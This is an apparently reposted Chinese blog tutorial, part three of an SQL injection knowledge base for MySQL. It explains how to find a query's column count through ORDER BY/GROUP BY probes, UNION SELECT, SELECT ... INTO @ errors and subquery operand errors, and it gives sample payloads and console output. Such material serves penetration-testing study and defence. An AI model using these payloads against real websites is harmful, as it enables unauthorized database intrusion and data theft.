码迷,mamicode.com
首页 > 数据库 > 详细

sql注入知识库-mysql篇(3)

时间:2015-03-10 15:26:47      阅读:198      评论:0      收藏:0      [点我收藏+]

标签:

上接sql注入知识库-mysql篇(2)

表和字段

一、检测字段数量

order by/group  by

group by / order by +1 ;

备注:

order by 和 group by 都是用来根据字段排序用的

保持数字持续增加,直到得到一个错误响应

尽管group by 和 order by 在sql中是不同的功能,他们都可以用完全相同的方式确认查询的列数

examples:

Given the query SELECT username, password, permission FROM Users WHERE id = ‘{INJECTION POINT}‘;

1’ order by 1--+   true

还原一下 select username,password,permission from users where id = ‘1‘ order by 1 --+ 

从users表查询id = 1 的username , password permission 然后通过第一个字段(username)按照升序排列

1’ order by 2--+   true

。。。。

1’ order by 4--+   false 说明该表总共有3列

1‘ union select 1,2,3  true

基于错误1

group by 或 order by 1,2,3,4,5 ......

类似上面提到的方法,我们可以通过一个请求查看显错模式是否启动来判断字段数量

examples:

select * from student where id = 1 order by 1,2,3 ;  true

select * from student where id = 1 order by 1,2,3,4 ;  true

select * from student where id = 1 order by 1,2,3,4,5 ;  返回   ERROR 1054 (42S22): Unknown column ‘5‘ in ‘order clause‘

说明该表字段只有4列

select * from student where id = 1 group by 1,2,3,4,5 ;  返回   ERROR 1054 (42S22): Unknown column ‘5‘ in ‘group statement‘

说明该表字段只有4列

基于错误2

select  ... into var_list , var_list1 , var_list2 ....

1. 如果显错模式开启,这个方法可以正常工作

2. 是一个实用的用于查找字段数量的方法,当注入点后面存在一个limit子句的时候。

examples:

Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

-1 union select 1 into @,@,@  The used SELECT statements have a different number of columns

-1 union select 1 into @   如果不报错说明查询的信息使用了一个

mysql> select name,id1 from student limit 1,1 into @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select name,id1 from student limit 1,1 into @,@;
Query OK, 1 row affected (0.00 sec)

字段

实例

mysql> select name from student where id = -1 union select 1 into @;    可以看到该查询使用了name一个字段,所以后面用select 1 into @就不会报错
Query OK, 1 row affected (0.00 sec)

mysql> select name,id1 from student where id = -1 union select 1,2 into @,@;  这里使用了name和id1两个字段,所以后面相应的要使用1,2 into @,@ 不会报错
Query OK, 1 row affected (0.00 sec)

examples:

Given the query SELECT username, permission FROM Users limit 1,{INJECTION POINT};

1 into @,@,@    报错 The used SELECT statements have a different number of columns

1 into @,@        无报错说明查询的字段有2个

实例:

select name,id1 from student limit 1,1 into @;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
select name,id1 from student limit 1,1 into @,@;
Query OK, 1 row affected (0.00 sec)

 limit用法:

limit 开始位置,取几条
select name,id from student limit 0,1;  从student表中取出第一条数据
select name,id from student limit 1,1;   从student表中取出第二条数据
select name,id from student limit 0,3;  从student表中取出3条数据,从第一条开始取
 

基于错误3

 AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

备注:

工作在你知道表名但是没有启用错误回显的环境,它会返回字段数量

example:

Given the query SELECT permission FROM Users WHERE id = {INJECTION POINT};

1 and (select * from student) = 1

实例:
select name,id from student where id = 1 and (select * from student) = 1;

ERROR 1241 (21000): Operand should contain 4 column(s)


select name,id from student where id = 1 and (select * from student) = 2;
ERROR 1241 (21000): Operand should contain 4 column(s)

sql注入知识库-mysql篇(3)

标签:

原文地址:http://www.cnblogs.com/luyg24/p/4322541.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!